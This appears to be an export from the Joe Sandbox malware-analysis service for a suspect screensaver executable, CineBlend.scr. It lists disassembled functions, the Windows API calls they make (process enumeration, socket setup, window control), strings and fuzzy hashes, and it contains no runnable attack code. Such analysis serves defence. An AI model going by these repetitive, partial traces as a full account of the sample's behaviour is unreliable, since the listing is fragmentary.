Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
API String ID: 2506810119-2343814001
Opcode ID: 892a25007b1fa284854cbfb3d185d76237f1c30aeff2725d2621d182bc98ca99
Instruction ID: b5fa37c45cf72ead46ffe3cc7491e0a4e9f2a261151d994b887a84546aaccc21
Opcode Fuzzy Hash: 892a25007b1fa284854cbfb3d185d76237f1c30aeff2725d2621d182bc98ca99
Instruction Fuzzy Hash: C3316271A04218AFCB21DF9DDC85D9EBBFCEB85710B10C5E6E82897311E6708E40DBA0

Function 00BACB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BACBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00BACBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C129C0,00C970E0), ref: 00BACC40

Strings

0, xrefs: 00BACB8A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 157b395c811b080768762a56af5aa36cd15d34a98fd051974a877b52d54905f3
Instruction ID: bf3806b343140b7ecbe0abc1d25fd7ee4dc377c7ebd406b549ba1b7fb160c2d9
Opcode Fuzzy Hash: 157b395c811b080768762a56af5aa36cd15d34a98fd051974a877b52d54905f3
Instruction Fuzzy Hash: E041A4712083019FD720DF28D985B5ABFE4EF86724F14469DF5A597291EB30E904CBA2

Function 00BD4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BDDCD0,00000000,?,?,?,?), ref: 00BD4F48
GetWindowLongW.USER32 ref: 00BD4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD4F75

Strings

SysTreeView32, xrefs: 00BD4F1A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 16722bc3088388edab9b92dd4808884ffd3d0894cc0e379ba7ff0ee75effb24b
Instruction ID: d03786221cb8bfc690bd71a365a25bd0274045081ac2ccb8320ea99c7d0b2fce
Opcode Fuzzy Hash: 16722bc3088388edab9b92dd4808884ffd3d0894cc0e379ba7ff0ee75effb24b
Instruction Fuzzy Hash: E3318131114205AFDB258F78CC45BDABBE9EB08334F244766F979922E0E770EC509750

Function 00BC3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00BC3AD4,?,?), ref: 00BC3DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BC3AD7
_wcslen.LIBCMT ref: 00BC3AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00BC3B63

Strings

255.255.255.255, xrefs: 00BC3AF2, 00BC3AF7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: c4c0073f3faec5a7566464d17a97c58b57cd4d611f293fbfdb88a45215c58acf
Instruction ID: 5fdb06ef4766793ed70f363cc605163b19c3104abb593b66a12da6554ff394cc
Opcode Fuzzy Hash: c4c0073f3faec5a7566464d17a97c58b57cd4d611f293fbfdb88a45215c58acf
Instruction Fuzzy Hash: 7E318E356002019FCB10CF68C5C5F69B7E1EF15718FA4C19DE8168B292D732EE46CB60

Function 00BD4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BD49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BD49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD4A14

Strings

SysMonthCal32, xrefs: 00BD49A7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 0f0de1d731180b4c1f00a6fe0d4b3944d425c755108316e21c791c770c2dc852
Instruction ID: 95aa86999cfa053072f003d2b7b9a0c4a0c3b407861e3dd840d04bbd78762fc2
Opcode Fuzzy Hash: 0f0de1d731180b4c1f00a6fe0d4b3944d425c755108316e21c791c770c2dc852
Instruction Fuzzy Hash: 1D21EF32600219AFDF118F90CC82FEB7BA9EF48714F110255FA556B1D0EBB5A851DB90

Function 00BD50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BD51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BD51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BD51B8

Strings

msctls_updown32, xrefs: 00BD5122

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 92fcb9a72994785bc2e554d6a9e4f378944074c7eaa60a27b7bb45ab9295f1e0
Instruction ID: d66a6c2a0c0b8d3561daa81dd518f0f295422b82c8ff9efebbe9b417d8702fa3
Opcode Fuzzy Hash: 92fcb9a72994785bc2e554d6a9e4f378944074c7eaa60a27b7bb45ab9295f1e0
Instruction Fuzzy Hash: B82160B5601609AFDB10DF68DC91EBB77EDEB5A764B04019AF9009B361DB70EC11CBA0

Function 00BD4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BD42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BD42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BD4312

Strings

Listbox, xrefs: 00BD42AB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 011dbdd71e0c596641995e742674f37d17b0f5475e1e103e28b2fea26d657b9a
Instruction ID: 7ff83c802281ccac9952d8a26a43bce8ae70c8e743f73a172e0a0b0b53518f10
Opcode Fuzzy Hash: 011dbdd71e0c596641995e742674f37d17b0f5475e1e103e28b2fea26d657b9a
Instruction Fuzzy Hash: B921B032610118BBEF118F94CC84FAB77AEEB89764F118166F9409B290DB719C5187A0

Function 00BB5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00BB544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BB54A1
SetErrorMode.KERNEL32(00000000,?,?,00BDDCD0), ref: 00BB5515

Strings

%lu, xrefs: 00BB54B4

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: e052419ec564bf0f9571a30d0a23f15458f5e3595371bedbb7715350c537b130
Instruction ID: e6919af19650894e8d839b88c04a7981e2902a76a321d00c2c25528546d4445b
Opcode Fuzzy Hash: e052419ec564bf0f9571a30d0a23f15458f5e3595371bedbb7715350c537b130
Instruction Fuzzy Hash: 8A314F70A00209AFDB10DF64C885EAAB7F8EF05304F1440E9E949DB362DB71EE45DB61

Function 00BD4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BD4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BD4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BD4D0F

Strings

msctls_trackbar32, xrefs: 00BD4CC4

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 2af90b52c3a6b281cbcb401543a5a3985e3a77aacd88f506ad227f22d95be1f8
Instruction ID: dc86d1199ab62885af592571e1336d6be8b297d62714ba852843ba6dbb4c519b
Opcode Fuzzy Hash: 2af90b52c3a6b281cbcb401543a5a3985e3a77aacd88f506ad227f22d95be1f8
Instruction Fuzzy Hash: 95112331240208BFEF205E65CC46FAB77E9EF85B24F110126FA50E21A0E671DC10DB20

Function 00BA389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

Part of subcall function 00BA36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BA3712
Part of subcall function 00BA36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA3723
Part of subcall function 00BA36F4: GetCurrentThreadId.KERNEL32 ref: 00BA372A
Part of subcall function 00BA36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00BA3731

GetFocus.USER32 ref: 00BA38C4

Part of subcall function 00BA373B: GetParent.USER32(00000000), ref: 00BA3746

GetClassNameW.USER32(?,?,00000100), ref: 00BA390F
EnumChildWindows.USER32(?,00BA3987), ref: 00BA3937

Strings

%s%d, xrefs: 00BA394B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 6408490b8693d7bd7f0ea65d9b76d96724328a3e88ceea5a0dbf9beb2c605438
Instruction ID: 1fac5132c1205d0b3fa9b11c535cbdbc92d6c75192cd93dd0a594d8ebfc8bc8d
Opcode Fuzzy Hash: 6408490b8693d7bd7f0ea65d9b76d96724328a3e88ceea5a0dbf9beb2c605438
Instruction Fuzzy Hash: B311D2716042056BCF01BF748C86AEEB7EAAF95700F0480B5B9499B292DF719A09DB60

Function 00BD6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BD6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BD638D
DrawMenuBar.USER32(?), ref: 00BD639C

Strings

0, xrefs: 00BD632E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 9d645690e97b4166e5645bc28ee6e98f875da58d8b6bc7c8271a155d226d26bd
Instruction ID: 0e96efe191aea541892c48a65b2c2ef5b2e63b6b3f6c20ab78ec51ca746d919c
Opcode Fuzzy Hash: 9d645690e97b4166e5645bc28ee6e98f875da58d8b6bc7c8271a155d226d26bd
Instruction Fuzzy Hash: BC016D31514218AFDB219F15DC84BAEBBF8FB45365F1480DAF849D6250EF308A85EF21

Function 00BA096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4abedfb4193ecd9a9934f25d77bfe310f775095a9652fc5f4d80fbd187edc9
Instruction ID: 339bae80baf2a39a9d6dbeaecf505ce46e8430bba77c57a374470c2f5ade5e63
Opcode Fuzzy Hash: 8a4abedfb4193ecd9a9934f25d77bfe310f775095a9652fc5f4d80fbd187edc9
Instruction Fuzzy Hash: 64C15775A1420AEFCB04DFA4C894AAEB7F5FF49714F208598E406EB251D731EE81CB90

Function 00B741F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B7427E
__alldvrm.LIBCMT ref: 00B7447F
__alldvrm.LIBCMT ref: 00B744A1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction ID: 5cefe833d24a6e72a9d50577a787dbee8b3be7834a407e5583a13ef2de99c2d4
Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction Fuzzy Hash: 18A14672A043869FEB11DF18C8917AEBBE5EF11311F2581E9E5BD9B382C7388941CB54

Function 00BA0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BE0BD4,?), ref: 00BA0EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BE0BD4,?), ref: 00BA0EF8
CLSIDFromProgID.OLE32(?,?,00000000,00BDDCE0,000000FF,?,00000000,00000800,00000000,?,00BE0BD4,?), ref: 00BA0F1D
_memcmp.LIBVCRUNTIME ref: 00BA0F3E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: be7685c71c7d4ed91109fc42bb381e538b6b61b164d0cf824fb5c5abf2680728
Instruction ID: 04f339dc88fb476adc5d97ba56051bb011a17a4b8079499a5c1e364f1aec5a5f
Opcode Fuzzy Hash: be7685c71c7d4ed91109fc42bb381e538b6b61b164d0cf824fb5c5abf2680728
Instruction Fuzzy Hash: C4811771A10109EFCB14EF94C984EEEB7F9FF89315F204598E506AB250DB71AE06DB60

Function 00BCB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00BCB10C
Process32FirstW.KERNEL32(00000000,?), ref: 00BCB11A

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Process32NextW.KERNEL32(00000000,?), ref: 00BCB1FC
CloseHandle.KERNEL32(00000000), ref: 00BCB20B

Part of subcall function 00B5E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B84D73,?), ref: 00B5E395

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: e45a8310d198e2fadeea06fc1a22c64eb9c0d7c2bd67d3ab8b66cbc6eeca0b03
Instruction ID: a1861c2a5b9abb937dd1c209de26bbcef93801c65dc6e97c11d1a97f4020130c
Opcode Fuzzy Hash: e45a8310d198e2fadeea06fc1a22c64eb9c0d7c2bd67d3ab8b66cbc6eeca0b03
Instruction Fuzzy Hash: 5251E5B1908300AFD710EF24C886E6BBBE8FF89754F4049ADF59597251EB71DA04CB92

Function 00B81711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B81840

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: da0188e520c540e260eac0ae466eabe29a1cb1d9134bd51463dc517a1de3c0e6
Instruction ID: 944dee93e55978843803f64e0d9b3ac51f12b5661bf51a41e6821f3092ebddf1
Opcode Fuzzy Hash: da0188e520c540e260eac0ae466eabe29a1cb1d9134bd51463dc517a1de3c0e6
Instruction Fuzzy Hash: BA41F976A02101AADB257EBD9C83A7E36ECEF45730F144AE5F428D61B1DB354C42C761

Function 00BC2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00BC255A
WSAGetLastError.WSOCK32 ref: 00BC2568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BC25E7
WSAGetLastError.WSOCK32 ref: 00BC25F1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 7c46fa074ca2637b91e6d119ddc3d68dbc732ea8709d137ab7882f3f6986a739
Instruction ID: 445f6e1e4fb809dc3c79600335d7dbcf674e1a3c3b831c13a2d81b198fed05ef
Opcode Fuzzy Hash: 7c46fa074ca2637b91e6d119ddc3d68dbc732ea8709d137ab7882f3f6986a739
Instruction Fuzzy Hash: E741A174A40200AFE720AF24C896F2A77E5EB54754F54C4DCF9558F2D2D772ED428B90

Function 00BD6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BD6D1A
ScreenToClient.USER32(?,?), ref: 00BD6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00BD6DBA

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

